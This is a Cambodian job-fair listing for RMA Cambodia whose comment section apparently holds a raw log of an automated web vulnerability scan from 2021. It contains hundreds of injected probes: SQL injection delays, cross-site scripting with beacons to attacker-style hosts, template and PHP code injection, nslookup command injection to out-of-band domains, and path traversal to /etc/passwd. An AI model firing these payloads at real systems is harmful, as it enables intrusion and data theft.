ថ្ងៃទី 14 - 15 ខែ វិច្ឆិកា ឆ្នាំ 2020 ក្រសួងការងារ និងបណ្តុះបណ្តាលវិជ្ជាជីវៈ

RMA Cambodia
RMA (Cambodia) Group was established in 1992 in Phnom Penh, and has been gradually growing to offer a wide range of products and services starting from the automotive, agriculture equipment, heavy equipment for infrastructure development, special product like cleaning machine, engineering solution, car rental, leasing, and food services. With almost 3,500 employees.

ដាក់ពាក្យស្មើសុំការងារ (CV)!

ចំនួន CV ដែលបានដាក់ពាក្យរួច 109

សូមរៀបចំ CV ជាទម្រង់ Microsoft Word, PDF ឬជារូបភាព JPG។ ទំហំមិនធំជាង 5MB។


តម្រូវការជ្រើសរើសកម្លាំងពលកម្ម សរុប 385 កន្លែង

   
សំណួរ ចម្លើយ ឬ មតិយោបល់ ទៅក្រុមហ៊ុន

 • pHqghUme

  2021-05-06 09:00:48


  @@7jUXT


 • pHqghUme

  2021-05-06 09:00:45


  1'"


 • pHqghUme

  2021-05-06 09:00:44


  1'||DBMS_PIPE.RECEIVE_MESSAGE(CHR(98)||CHR(98)||CHR(98),15)||'


 • pHqghUme

  2021-05-06 09:00:37


  1*DBMS_PIPE.RECEIVE_MESSAGE(CHR(99)||CHR(99)||CHR(99),15)


 • pHqghUme

  2021-05-06 09:00:30


  LA868ABp')) OR 966=(SELECT 966 FROM PG_SLEEP(15))--


 • pHqghUme

  2021-05-06 09:00:23


  PmhjpCcf') OR 794=(SELECT 794 FROM PG_SLEEP(15))--


 • pHqghUme

  2021-05-06 09:00:19


  hLf8OuQM' OR 73=(SELECT 73 FROM PG_SLEEP(15))--


 • pHqghUme

  2021-05-06 09:00:13


  -1)) OR 437=(SELECT 437 FROM PG_SLEEP(15))--


 • pHqghUme

  2021-05-06 09:00:06


  -5) OR 799=(SELECT 799 FROM PG_SLEEP(15))--


 • pHqghUme

  2021-05-06 08:59:58


  -5 OR 394=(SELECT 394 FROM PG_SLEEP(15))--


 • pHqghUme

  2021-05-06 08:59:51


  aUiLHDgr'; waitfor delay '0:0:15' --


 • pHqghUme

  2021-05-06 08:59:44


  1 waitfor delay '0:0:15' --


 • pHqghUme

  2021-05-06 08:59:39


  -1); waitfor delay '0:0:15' --


 • pHqghUme

  2021-05-06 08:59:30


  -1; waitfor delay '0:0:15' --


 • pHqghUme

  2021-05-06 08:59:19


  (select(0)from(select(sleep(15)))v)/*'+(select(0)from(select(sleep(15)))v)+'"+(select(0)from(select(sleep(15)))v)+"*/


 • pHqghUme

  2021-05-06 08:59:12


  0"XOR(if(now()=sysdate(),sleep(15),0))XOR"Z


 • pHqghUme

  2021-05-06 08:59:04


  0'XOR(if(now()=sysdate(),sleep(15),0))XOR'Z


 • pHqghUme

  2021-05-06 08:58:58


  if(now()=sysdate(),sleep(15),0)


 • pHqghUme

  2021-05-06 08:58:52


  -1" OR 2+543-543-1=0+0+0+1 --


 • pHqghUme

  2021-05-06 08:58:51


  -1' OR 2+438-438-1=0+0+0+1 --


 • pHqghUme

  2021-05-06 08:58:51


  -1' OR 2+532-532-1=0+0+0+1 or 'Ap9Kj6QL'='


 • pHqghUme

  2021-05-06 08:58:50


  -1 OR 2+315-315-1=0+0+0+1 --


 • pHqghUme

  2021-05-06 08:58:50


  -1 OR 2+807-807-1=0+0+0+1


 • pHqghUme

  2021-05-06 08:58:49


  apREZkxf


 • pHqghUme

  2021-05-06 08:58:42


  1


 • pHqghUme

  2021-05-06 08:58:36


  1


 • @@7Piu1

  2021-05-06 08:58:27


  1


 • 1'"

  2021-05-06 08:58:24


  1


 • pHqghUme'||DBMS_PIPE.RECEIVE_MESSAGE(CHR(98)||CHR(98)||CHR(98),15)||'

  2021-05-06 08:58:23


  1


 • OAIyDmix')) OR 19=(SELECT 19 FROM PG_SLEEP(15))--

  2021-05-06 08:58:12


  1


 • ayQTNWIz') OR 159=(SELECT 159 FROM PG_SLEEP(15))--

  2021-05-06 08:58:03


  1


 • 2bCphE30' OR 11=(SELECT 11 FROM PG_SLEEP(15))--

  2021-05-06 08:57:53


  1


 • U4yXTcug'; waitfor delay '0:0:15' --

  2021-05-06 08:57:41


  1


 • 1 waitfor delay '0:0:15' --

  2021-05-06 08:57:28


  1


 • (select(0)from(select(sleep(15)))v)/*'+(select(0)from(select(sleep(15)))v)+'"+(select(0)from(select(sleep(15)))v)+"*/

  2021-05-06 08:57:15


  1


 • 0"XOR(if(now()=sysdate(),sleep(15),0))XOR"Z

  2021-05-06 08:57:04


  1


 • 0'XOR(if(now()=sysdate(),sleep(15),0))XOR'Z

  2021-05-06 08:56:50


  1


 • if(now()=sysdate(),sleep(15),0)

  2021-05-06 08:56:38


  1


 • -1" OR 2+883-883-1=0+0+0+1 --

  2021-05-06 08:56:27


  1


 • -1' OR 2+65-65-1=0+0+0+1 or 'fQ2v4Q4r'='

  2021-05-06 08:56:26


  1


 • -1 OR 2+598-598-1=0+0+0+1

  2021-05-06 08:56:25


  1


 • -1' OR 2+537-537-1=0+0+0+1 --

  2021-05-06 08:56:25


  1


 • 0YSKtdlo

  2021-05-06 08:56:24


  1


 • -1 OR 2+812-812-1=0+0+0+1 --

  2021-05-06 08:56:24


  1


 • pHqghUme

  2021-05-06 08:56:13


  1


 • pHqghUme

  2021-05-06 08:56:01


  1


 • pHqghUme

  2021-05-06 08:55:52


  1


 • pHqghUme

  2021-05-06 08:55:47


  1


 • pHqghUme

  2021-05-06 08:55:47


  1


 • pHqghUme

  2021-05-06 08:55:39


  1


 • pHqghUme

  2021-05-06 08:55:31


  1


 • pHqghUme

  2021-05-06 08:55:21


  1


 • pHqghUme

  2021-05-06 08:55:11


  1


 • pHqghUme

  2021-05-06 08:54:56


  1


 • pHqghUme

  2021-05-06 08:54:41


  1


 • pHqghUme

  2021-05-06 08:54:24


  1


 • pHqghUme

  2021-05-06 08:54:06


  1


 • pHqghUme

  2021-05-06 08:53:48


  1


 • pHqghUme

  2021-05-06 08:53:27


  1


 • pHqghUme

  2021-05-06 08:53:26


  1


 • pHqghUme

  2021-05-06 08:53:25


  1


 • pHqghUme

  2021-05-06 08:53:24


  1


 • pHqghUme

  2021-05-06 08:53:23


  1


 • pHqghUme

  2021-05-06 08:53:22


  1


 • pHqghUme

  2021-05-06 08:53:02


  1


 • pHqghUme

  2021-05-06 08:52:33


  1


 • pHqghUme

  2021-05-06 08:52:11


  1


 • pHqghUme

  2021-05-06 08:52:07


  1


 • pHqghUme

  2021-05-06 08:52:05


  1


 • pHqghUme

  2021-05-06 08:51:44


  1


 • pHqghUme

  2021-05-06 08:51:20


  1


 • pHqghUme

  2021-05-06 08:51:04


  1


 • pHqghUme

  2021-05-06 08:50:48


  1


 • pHqghUme

  2021-05-06 08:50:35


  1


 • pHqghUme

  2021-05-06 08:50:14


  1


 • pHqghUme

  2021-05-06 08:49:58


  1


 • pHqghUme

  2021-05-06 08:49:39


  1


 • pHqghUme

  2021-05-06 08:49:22


  1


 • pHqghUme

  2021-05-06 08:49:07


  1


 • pHqghUme

  2021-05-06 08:49:05


  1


 • pHqghUme

  2021-05-06 08:49:04


  1


 • pHqghUme

  2021-05-06 08:49:03


  1


 • pHqghUme

  2021-05-06 08:49:02


  1


 • pHqghUme

  2021-05-06 08:49:01


  1


 • pHqghUme

  2021-05-06 08:48:56


  1<Tr8rzx<


 • pHqghUme

  2021-05-06 08:48:44


  1


 • pHqghUme

  2021-05-06 08:48:41


  1<img sRc='http://attacker-9645/log.php?


 • pHqghUme

  2021-05-06 08:48:34


  1<50kCtf x=9622>


 • pHqghUme

  2021-05-06 08:48:29


  1<ifRAme sRc=9416.com></IfRamE>


 • pHqghUme

  2021-05-06 08:48:28


  1


 • pHqghUme

  2021-05-06 08:48:22


  1<WRKNXK>F8XP6[!+!]</WRKNXK>


 • pHqghUme

  2021-05-06 08:48:15


  1Yu3QO <ScRiPt >BV1D(9809)</ScRiPt>


 • pHqghUme

  2021-05-06 08:48:08


  1<% contenteditable onresize=BV1D(9733)>


 • pHqghUme

  2021-05-06 08:48:00


  1}body{acu:Expre/**/SSion(BV1D(9314))}


 • pHqghUme

  2021-05-06 08:47:50


  <a HrEF=jaVaScRiPT:>


 • pHqghUme

  2021-05-06 08:47:40


  <a HrEF=http://xss.bxss.me></a>


 • pHqghUme

  2021-05-06 08:47:29


  1<input autofocus onfocus=BV1D(9820)>


 • pHqghUme

  2021-05-06 08:47:20


  1&lt;ScRiPt&gt;BV1D(9144)&lt;/sCripT&gt;


 • pHqghUme

  2021-05-06 08:47:14


  1\u003CScRiPt\BV1D(9769)\u003C/sCripT\u003E


 • pHqghUme

  2021-05-06 08:47:08


  %31%3C%53%63%52%69%50%74%20%3E%42%56%31%44%289407%29%3C%2F%73%43%72%69%70%54%3E


 • pHqghUme

  2021-05-06 08:47:03


  1<img/src=">" onerror=alert(9369)>


 • pHqghUme

  2021-05-06 08:46:57


  1<img src=xyz OnErRor=BV1D(9078)>


 • pHqghUme

  2021-05-06 08:46:52


  1<img src=//xss.bxss.me/t/dot.gif onload=BV1D(9929)>


 • pHqghUme

  2021-05-06 08:46:47


  1<body onload=BV1D(9591)>


 • pHqghUme

  2021-05-06 08:46:41


  1<iframe src='data:text/html;base64,PHNjcmlwdD5hbGVydCgnYWN1bmV0aXgteHNzLXRlc3QnKTwvc2NyaXB0Pgo=' invalid='9394'>


 • pHqghUme

  2021-05-06 08:46:37


  1<isindex type=image src=1 onerror=BV1D(9741)>


 • pHqghUme

  2021-05-06 08:46:26


  1<ScRiPt >BV1D(9073)</ScRiPt>


 • pHqghUme

  2021-05-06 08:46:20


  1<ScRiPt/acu src=//xss.bxss.me/t/xss.js?9361></ScRiPt>


 • pHqghUme

  2021-05-06 08:46:11


  1<ScRiPt >BV1D(9344)</ScRiPt>


 • pHqghUme

  2021-05-06 08:46:07


  1%3C%53%63%52%3C%53%63%52%69%50%74%3E%49%70%54%3E%42%56%31%44%28%39%31%36%33%29%3C%2F%73%43%72%3C%53%63%52%69%50%74%3E%49%70%54%3E


 • pHqghUme

  2021-05-06 08:46:01


  1<script>BV1D(9265)</script>


 • pHqghUme

  2021-05-06 08:45:54


  1<WTVFPV>L34NT[!+!]</WTVFPV>


 • pHqghUme

  2021-05-06 08:45:48


  1<ScRiPt >BV1D(9657)</ScRiPt>


 • pHqghUme

  2021-05-06 08:45:42


  "acxzzzzzzzzbbbccccdddeeexca".replace("z","o")


 • pHqghUme

  2021-05-06 08:45:36


  acx__${98991*97996}__::.x


 • pHqghUme

  2021-05-06 08:45:33


  acx[[${98991*97996}]]xca


 • pHqghUme

  2021-05-06 08:45:29


  acx{{98991*97996}}xca


 • pHqghUme

  2021-05-06 08:45:23


  1}}"}}'}}1%>"%>'%><%={{={@{#{${acx}}%>


 • pHqghUme

  2021-05-06 08:45:17


  <th:t="${acx}#foreach


 • pHqghUme

  2021-05-06 08:45:13


  <%={{={@{#{${acx}}%>


 • pHqghUme

  2021-05-06 08:45:07


  acux6829%C0%BEz1%C0%BCz2a%90bcxuca6829


 • pHqghUme

  2021-05-06 08:45:03


  acu10036%EF%BC%9Cs1%EF%B9%A5s2%CA%BAs3%CA%B9uca10036


 • pHqghUme

  2021-05-06 08:44:57


  19974672


 • pHqghUme

  2021-05-06 08:44:53


  '"()&%<acx><ScRiPt >BV1D(9509)</ScRiPt>


 • pHqghUme

  2021-05-06 08:44:48


  1'"()&%<acx><ScRiPt >BV1D(9901)</ScRiPt>


 • pHqghUme<cgmW3R<

  2021-05-06 08:44:43


  1


 • pHqghUme<img sRc='http://attacker-9200/log.php?

  2021-05-06 08:44:39


  1


 • pHqghUme<F4nD0N x=9574>

  2021-05-06 08:44:34


  1


 • pHqghUme<ifRAme sRc=9766.com></IfRamE>

  2021-05-06 08:44:29


  1


 • pHqghUme<WHYMC0>YWZ2N[!+!]</WHYMC0>

  2021-05-06 08:44:21


  1


 • pHqghUmex4Bwg <ScRiPt >BV1D(9565)</ScRiPt>

  2021-05-06 08:44:16


  1


 • pHqghUme

  2021-05-06 08:44:16


  1


 • pHqghUme<% contenteditable onresize=BV1D(9699)>

  2021-05-06 08:44:11


  1


 • pHqghUme}body{acu:Expre/**/SSion(BV1D(9370))}

  2021-05-06 08:44:05


  1


 • pHqghUme

  2021-05-06 08:44:00


  1


 • <a HrEF=jaVaScRiPT:>

  2021-05-06 08:43:58


  1


 • <a HrEF=http://xss.bxss.me></a>

  2021-05-06 08:43:52


  1


 • pHqghUme<input autofocus onfocus=BV1D(9452)>

  2021-05-06 08:43:43


  1


 • pHqghUme&lt;ScRiPt&gt;BV1D(9214)&lt;/sCripT&gt;

  2021-05-06 08:43:36


  1


 • pHqghUme\u003CScRiPt\BV1D(9376)\u003C/sCripT\u003E

  2021-05-06 08:43:31


  1


 • %70%48%71%67%68%55%6D%65%3C%53%63%52%69%50%74%20%3E%42%56%31%44%289701%29%3C%2F%73%43%72%69%70%54%3E

  2021-05-06 08:43:21


  1


 • pHqghUme<img/src=">" onerror=alert(9082)>

  2021-05-06 08:43:15


  1


 • pHqghUme<img src=xyz OnErRor=BV1D(9829)>

  2021-05-06 08:43:12


  1


 • pHqghUme<img src=//xss.bxss.me/t/dot.gif onload=BV1D(9347)>

  2021-05-06 08:43:08


  1


 • pHqghUme<body onload=BV1D(9281)>

  2021-05-06 08:43:05


  1


 • pHqghUme<iframe src='data:text/html;base64,PHNjcmlwdD5hbGVydCgnYWN1bmV0aXgteHNzLXRlc3QnKTwvc2NyaXB0Pgo=' invalid='9050'>

  2021-05-06 08:43:00


  1


 • pHqghUme<isindex type=image src=1 onerror=BV1D(9639)>

  2021-05-06 08:42:57


  1


 • pHqghUme<ScRiPt >BV1D(9228)</ScRiPt>

  2021-05-06 08:42:48


  1


 • pHqghUme<ScRiPt/acu src=//xss.bxss.me/t/xss.js?9033></ScRiPt>

  2021-05-06 08:42:43


  1


 • pHqghUme<ScRiPt >BV1D(9135)</ScRiPt>

  2021-05-06 08:42:36


  1


 • pHqghUme%3C%53%63%52%3C%53%63%52%69%50%74%3E%49%70%54%3E%42%56%31%44%28%39%37%38%38%29%3C%2F%73%43%72%3C%53%63%52%69%50%74%3E%49%70%54%3E

  2021-05-06 08:42:31


  1


 • pHqghUme<script>BV1D(9537)</script>

  2021-05-06 08:42:26


  1


 • pHqghUme<WHLJHT>SGWLH[!+!]</WHLJHT>

  2021-05-06 08:42:20


  1


 • pHqghUme<ScRiPt >BV1D(9588)</ScRiPt>

  2021-05-06 08:42:15


  1


 • "acxzzzzzzzzbbbccccdddeeexca".replace("z","o")

  2021-05-06 08:42:11


  1


 • acx__${98991*97996}__::.x

  2021-05-06 08:42:06


  1


 • acx[[${98991*97996}]]xca

  2021-05-06 08:42:01


  1


 • acx{{98991*97996}}xca

  2021-05-06 08:41:55


  1


 • 1}}"}}'}}1%>"%>'%><%={{={@{#{${acx}}%>

  2021-05-06 08:41:50


  1


 • <th:t="${acx}#foreach

  2021-05-06 08:41:45


  1


 • <%={{={@{#{${acx}}%>

  2021-05-06 08:41:37


  1


 • acux8099%C0%BEz1%C0%BCz2a%90bcxuca8099

  2021-05-06 08:41:31


  1


 • acu2284%EF%BC%9Cs1%EF%B9%A5s2%CA%BAs3%CA%B9uca2284

  2021-05-06 08:41:22


  1


 • pHqghUme9199663

  2021-05-06 08:41:16


  1


 • '"()&%<acx><ScRiPt >BV1D(9603)</ScRiPt>

  2021-05-06 08:41:10


  1


 • pHqghUme'"()&%<acx><ScRiPt >BV1D(9566)</ScRiPt>

  2021-05-06 08:41:03


  1


 • pHqghUme

  2021-05-06 08:40:58


  1


 • pHqghUme

  2021-05-06 08:40:53


  1


 • pHqghUme

  2021-05-06 08:40:46


  1


 • pHqghUme

  2021-05-06 08:40:40


  1


 • pHqghUme

  2021-05-06 08:40:31


  1


 • pHqghUme

  2021-05-06 08:40:25


  '.print(md5(31337)).'


 • pHqghUme

  2021-05-06 08:40:25


  1


 • pHqghUme

  2021-05-06 08:40:24


  ${@print(md5(31337))}\


 • pHqghUme

  2021-05-06 08:40:23


  ";print(md5(31337));$a="


 • pHqghUme

  2021-05-06 08:40:23


  ${@print(md5(31337))}


 • pHqghUme

  2021-05-06 08:40:22


  ';print(md5(31337));$a='


 • pHqghUme

  2021-05-06 08:40:21


  <!--


 • pHqghUme

  2021-05-06 08:40:21


  ;assert(base64_decode('cHJpbnQobWQ1KDMxMzM3KSk7'));


 • pHqghUme

  2021-05-06 08:40:20


  '"


 • '.print(md5(31337)).'

  2021-05-06 08:40:20


  1


 • pHqghUme

  2021-05-06 08:40:20


  `(nslookup hitarneyneenza89ff.bxss.me||perl -e "gethostbyname('hitarneyneenza89ff.bxss.me')")`


 • <!--

  2021-05-06 08:40:19


  1


 • pHqghUme

  2021-05-06 08:40:19


  |(nslookup hitodyxtrzpjbe014c.bxss.me||perl -e "gethostbyname('hitodyxtrzpjbe014c.bxss.me')")


 • ${@print(md5(31337))}\

  2021-05-06 08:40:19


  1


 • pHqghUme

  2021-05-06 08:40:18


  1


 • ";print(md5(31337));$a="

  2021-05-06 08:40:18


  1


 • '"

  2021-05-06 08:40:18


  1


 • ${@print(md5(31337))}

  2021-05-06 08:40:18


  1


 • ;assert(base64_decode('cHJpbnQobWQ1KDMxMzM3KSk7'));

  2021-05-06 08:40:17


  1


 • pHqghUme

  2021-05-06 08:40:17


  1


 • ';print(md5(31337));$a='

  2021-05-06 08:40:17


  1


 • pHqghUme

  2021-05-06 08:40:16


  1


 • pHqghUme

  2021-05-06 08:40:16


  1


 • pHqghUme

  2021-05-06 08:40:16


  1


 • /xfs.bxss.me

  2021-05-06 08:40:15


  1


 • pHqghUme

  2021-05-06 08:40:15


  1


 • pHqghUme

  2021-05-06 08:40:15


  /xfs.bxss.me


 • pHqghUme

  2021-05-06 08:40:14


  1


 • pHqghUme

  2021-05-06 08:40:14


  1


 • pHqghUme

  2021-05-06 08:40:14


  '"()


 • pHqghUme

  2021-05-06 08:40:14


  $(nslookup hitnpogjuuvqt08b67.bxss.me||perl -e "gethostbyname('hitnpogjuuvqt08b67.bxss.me')")


 • pHqghUme

  2021-05-06 08:40:14


  1


 • pHqghUme

  2021-05-06 08:40:14


  1


 • pHqghUme

  2021-05-06 08:40:13


  |echo mvxadj$()\ zucfkk\nz^xyu||a #' |echo mvxadj$()\ zucfkk\nz^xyu||a #|" |echo mvxadj$()\ zucfkk\nz^xyu||a #


 • pHqghUme

  2021-05-06 08:40:13


  bxss.me/t/xss.html?%00


 • pHqghUme

  2021-05-06 08:40:13


  1


 • pHqghUme

  2021-05-06 08:40:13


  (nslookup hitiomxqaruwf5d0e4.bxss.me||perl -e "gethostbyname('hitiomxqaruwf5d0e4.bxss.me')")


 • pHqghUme

  2021-05-06 08:40:12


  1


 • pHqghUme

  2021-05-06 08:40:12


  &echo iuqxfc$()\ bsouqe\nz^xyu||a #' &echo iuqxfc$()\ bsouqe\nz^xyu||a #|" &echo iuqxfc$()\ bsouqe\nz^xyu||a #


 • pHqghUme

  2021-05-06 08:40:12


  HttP://bxss.me/t/xss.html?%00


 • pHqghUme

  2021-05-06 08:40:12


  '+'A'.concat(70-3).concat(22*4).concat(118).concat(69).concat(100).concat(74)+(require'socket' Socket.gethostbyname('hitrh'+'zcwczuli2d21c.bxss.me.')[3].to_s)+'


 • pHqghUme

  2021-05-06 08:40:12


  1


 • '+'A'.concat(70-3).concat(22*4).concat(100).concat(69).concat(119).concat(73)+(require'socket' Socket.gethostbyname('hituq'+'jzgulgpt822b9.bxss.me.')[3].to_s)+'

  2021-05-06 08:40:11


  1


 • )))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))

  2021-05-06 08:40:11


  1


 • pHqghUme

  2021-05-06 08:40:11


  1


 • bxss.me/t/xss.html?%00

  2021-05-06 08:40:11


  1


 • pHqghUme

  2021-05-06 08:40:11


  echo nkzthb$()\ hpvbfy\nz^xyu||a #' &echo nkzthb$()\ hpvbfy\nz^xyu||a #|" &echo nkzthb$()\ hpvbfy\nz^xyu||a #


 • pHqghUme

  2021-05-06 08:40:11


  "+"A".concat(70-3).concat(22*4).concat(108).concat(89).concat(121).concat(68)+(require"socket" Socket.gethostbyname("hitdc"+"yhecupeid2722.bxss.me.")[3].to_s)+"


 • pHqghUme

  2021-05-06 08:40:11


  )))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))


 • pHqghUme

  2021-05-06 08:40:10


  1


 • pHqghUme

  2021-05-06 08:40:10


  1


 • HttP://bxss.me/t/xss.html?%00

  2021-05-06 08:40:10


  1


 • pHqghUme

  2021-05-06 08:40:09


  1


 • pHqghUme

  2021-05-06 08:40:09


  1


 • pHqghUme

  2021-05-06 08:40:09


  1


 • pHqghUme

  2021-05-06 08:40:09


  1


 • "+"A".concat(70-3).concat(22*4).concat(109).concat(71).concat(105).concat(73)+(require"socket" Socket.gethostbyname("hitvn"+"phvupsjfbf955.bxss.me.")[3].to_s)+"

  2021-05-06 08:40:09


  1


 • pHqghUme

  2021-05-06 08:40:08


  1


 • pHqghUme

  2021-05-06 08:40:08


  1


 • '"()

  2021-05-06 08:40:08


  1


 • pHqghUme

  2021-05-06 08:40:08


  1


 • pHqghUme

  2021-05-06 08:40:08


  1


 • |(nslookup hitbpreoehxxefc20b.bxss.me||perl -e "gethostbyname('hitbpreoehxxefc20b.bxss.me')")

  2021-05-06 08:40:07


  1


 • pHqghUme

  2021-05-06 08:40:07


  1


 • pHqghUme

  2021-05-06 08:40:07


  1


 • `(nslookup hittjfuhlkqcu2c8c6.bxss.me||perl -e "gethostbyname('hittjfuhlkqcu2c8c6.bxss.me')")`

  2021-05-06 08:40:07


  1


 • pHqghUme

  2021-05-06 08:40:07


  1


 • pHqghUme

  2021-05-06 08:40:07


  1


 • pHqghUme

  2021-05-06 08:40:04


  '.gethostbyname(lc('hitxq'.'stjnztwoff33d.bxss.me.')).'A'.chr(67).chr(hex('58')).chr(100).chr(69).chr(107).chr(76).'


 • pHqghUme

  2021-05-06 08:40:04


  ".gethostbyname(lc("hitfm"."rkoxjiyabad4b.bxss.me."))."A".chr(67).chr(hex("58")).chr(99).chr(78).chr(110).chr(81)."


 • pHqghUme

  2021-05-06 08:40:03


  1


 • ".gethostbyname(lc("hitbm"."gvykpomr4beeb.bxss.me."))."A".chr(67).chr(hex("58")).chr(109).chr(70).chr(99).chr(87)."

  2021-05-06 08:40:03


  1


 • '.gethostbyname(lc('hitkk'.'pnadpqmc25eb1.bxss.me.')).'A'.chr(67).chr(hex('58')).chr(103).chr(79).chr(97).chr(85).'

  2021-05-06 08:40:02


  1


 • pHqghUme

  2021-05-06 08:40:01


  1


 • $(nslookup hitwqgmnkxmsh22faa.bxss.me||perl -e "gethostbyname('hitwqgmnkxmsh22faa.bxss.me')")

  2021-05-06 08:40:01


  1


 • pHqghUme

  2021-05-06 08:40:00


  1&n907110=v930286


 • (nslookup hitytlhwsjvuyce254.bxss.me||perl -e "gethostbyname('hitytlhwsjvuyce254.bxss.me')")

  2021-05-06 08:40:00


  1


 • pHqghUme

  2021-05-06 08:39:59


  1


 • |echo yuecaj$()\ rvpacb\nz^xyu||a #' |echo yuecaj$()\ rvpacb\nz^xyu||a #|" |echo yuecaj$()\ rvpacb\nz^xyu||a #

  2021-05-06 08:39:59


  1


 • pHqghUme

  2021-05-06 08:39:59


  1


 • pHqghUme

  2021-05-06 08:39:59


  12345'"\'\");|]*%00{%0d%0a<%00>%bf%27'💡


 • &echo dpddzk$()\ wqpjym\nz^xyu||a #' &echo dpddzk$()\ wqpjym\nz^xyu||a #|" &echo dpddzk$()\ wqpjym\nz^xyu||a #

  2021-05-06 08:39:58


  1


 • pHqghUme

  2021-05-06 08:39:58


  ^(#$!@#$)(()))******


 • pHqghUme

  2021-05-06 08:39:58


  1


 • echo lvphyd$()\ rpiiul\nz^xyu||a #' &echo lvphyd$()\ rpiiul\nz^xyu||a #|" &echo lvphyd$()\ rpiiul\nz^xyu||a #

  2021-05-06 08:39:57


  1


 • pHqghUme

  2021-05-06 08:39:57


  !(()&&!|*|*|


 • pHqghUme

  2021-05-06 08:39:57


  1


 • pHqghUme

  2021-05-06 08:39:56


  )


 • ^(#$!@#$)(()))******

  2021-05-06 08:39:55


  1


 • )

  2021-05-06 08:39:54


  1


 • pHqghUme

  2021-05-06 08:39:54


  bxss.me


 • pHqghUme&n954357=v939512

  2021-05-06 08:39:54


  1


 • !(()&&!|*|*|

  2021-05-06 08:39:54


  1


 • pHqghUme

  2021-05-06 08:39:53


  1


 • pHqghUme

  2021-05-06 08:39:53


  http://bxss.me/t/fit.txt%3F.jpg


 • pHqghUme

  2021-05-06 08:39:52


  1


 • pHqghUme

  2021-05-06 08:39:52


  1


 • pHqghUme

  2021-05-06 08:39:52


  Http://bxss.me/t/fit.txt


 • pHqghUme

  2021-05-06 08:39:52


  1


 • pHqghUme

  2021-05-06 08:39:51


  1


 • pHqghUme

  2021-05-06 08:39:51


  http://some-inexistent-website.acu/some_inexistent_file_with_long_name%3F.jpg


 • pHqghUme

  2021-05-06 08:39:51


  1


 • pHqghUme

  2021-05-06 08:39:51


  1some_inexistent_file_with_long_name%00.jpg


 • pHqghUme

  2021-05-06 08:39:50


  1


 • bxss.me

  2021-05-06 08:39:50


  1


 • 12345'"\'\");|]*%00{%0d%0a<%00>%bf%27'💡

  2021-05-06 08:39:50


  1


 • pHqghUme

  2021-05-06 08:39:49


  1


 • pHqghUme

  2021-05-06 08:39:49


  1


 • http://bxss.me/t/fit.txt%3F.jpg

  2021-05-06 08:39:49


  1


 • 1some_inexistent_file_with_long_name%00.jpg

  2021-05-06 08:39:48


  1


 • pHqghUme

  2021-05-06 08:39:48


  1


 • pHqghUme

  2021-05-06 08:39:48


  1


 • Http://bxss.me/t/fit.txt

  2021-05-06 08:39:48


  1


 • pHqghUme

  2021-05-06 08:39:48


  1


 • pHqghUme

  2021-05-06 08:39:47


  1


 • pHqghUme

  2021-05-06 08:39:47


  1


 • http://some-inexistent-website.acu/some_inexistent_file_with_long_name%3F.jpg

  2021-05-06 08:39:47


  1


 • pHqghUme

  2021-05-06 08:39:47


  1


 • pHqghUme

  2021-05-06 08:39:46


  1


 • pHqghUme

  2021-05-06 08:39:46


  1


 • pHqghUme

  2021-05-06 08:39:45


  1


 • pHqghUme

  2021-05-06 08:39:45


  ../1


 • pHqghUme

  2021-05-06 08:39:45


  1


 • pHqghUme

  2021-05-06 08:39:44


  ../../../../../../../../../../../../../../windows/win.ini


 • pHqghUme

  2021-05-06 08:39:44


  1


 • pHqghUme

  2021-05-06 08:39:44


  1


 • ../pHqghUme

  2021-05-06 08:39:43


  1


 • pHqghUme

  2021-05-06 08:39:43


  1


 • pHqghUme

  2021-05-06 08:39:43


  ../../../../../../../../../../../../../../etc/passwd


 • pHqghUme

  2021-05-06 08:39:43


  1


 • pHqghUme

  2021-05-06 08:39:42


  1


 • pHqghUme

  2021-05-06 08:39:42


  1


 • pHqghUme

  2021-05-06 08:39:42


  1


 • pHqghUme

  2021-05-06 08:39:42


  1


 • pHqghUme

  2021-05-06 08:39:41


  1


 • ../../../../../../../../../../../../../../windows/win.ini

  2021-05-06 08:39:41


  1


 • pHqghUme

  2021-05-06 08:39:40


  1


 • pHqghUme

  2021-05-06 08:39:40


  1


 • pHqghUme

  2021-05-06 08:39:40


  1


 • ../../../../../../../../../../../../../../etc/passwd

  2021-05-06 08:39:40


  1


 • pHqghUme

  2021-05-06 08:39:39


  1


 • RnVXQ2dybmw=

  2021-05-06 08:39:39


  1


 • pHqghUme

  2021-05-06 08:39:39


  1


 • pHqghUme

  2021-05-06 08:39:39


  1


 • pHqghUme

  2021-05-06 08:39:38


  1


 • pHqghUme

  2021-05-06 08:39:37


  1


 • ${10000354+10000212}

  2021-05-06 08:39:37


  1


 • pHqghUme

  2021-05-06 08:39:37


  1


 • pHqghUme

  2021-05-06 08:39:37


  ${10000014+10000204}


 • pHqghUme

  2021-05-06 08:39:37


  1


 • pHqghUme

  2021-05-06 08:39:36


  1


 • pHqghUme

  2021-05-06 08:39:36


  1


 • pHqghUme

  2021-05-06 08:39:35


  1


 • pHqghUme

  2021-05-06 08:39:34


  1


 • pHqghUme

  2021-05-06 08:39:34


  1


 • pHqghUme

  2021-05-06 08:39:34


  1


 • pHqghUme

  2021-05-06 08:39:34


  1


 • pHqghUme

  2021-05-06 08:39:33


  1


 • pHqghUme

  2021-05-06 08:39:33


  1<esi:include src="http://bxss.me/rpb.png"/>


 • pHqghUme

  2021-05-06 08:39:32


  1


 • pHqghUme

  2021-05-06 08:39:32


  1


 • pHqghUme

  2021-05-06 08:39:32


  1


 • pHqghUme<esi:include src="http://bxss.me/rpb.png"/>

  2021-05-06 08:39:32


  1


 • pHqghUme

  2021-05-06 08:39:31


  1


 • pHqghUme

  2021-05-06 08:39:31


  1


 • pHqghUme

  2021-05-06 08:39:30


  1


 • pHqghUme

  2021-05-06 08:39:29


  1


 • 9d2voAj0

  2021-05-06 08:39:28


  1


 • pHqghUme

  2021-05-06 08:39:28


  1uvbFQPC


 • pHqghUme

  2021-05-06 08:39:27


  1


 • pHqghUme

  2021-05-06 08:39:26


  1


 • pHqghUme

  2021-05-06 08:39:25


  "+response.write(9143207*9572463)+"


 • pHqghUme

  2021-05-06 08:39:24


  response.write(9143207*9572463)


 • pHqghUme

  2021-05-06 08:39:24


  '+response.write(9143207*9572463)+'


 • '+response.write(9637651*9254581)+'

  2021-05-06 08:39:23


  1


 • "+response.write(9637651*9254581)+"

  2021-05-06 08:39:23


  1


 • response.write(9637651*9254581)

  2021-05-06 08:39:22


  1


 • pHqghUme

  2021-05-06 08:39:21


  1


 • pHqghUme

  2021-05-06 08:39:20


  1


 • pHqghUme

  2021-05-06 08:39:20


  1


 • pHqghUme

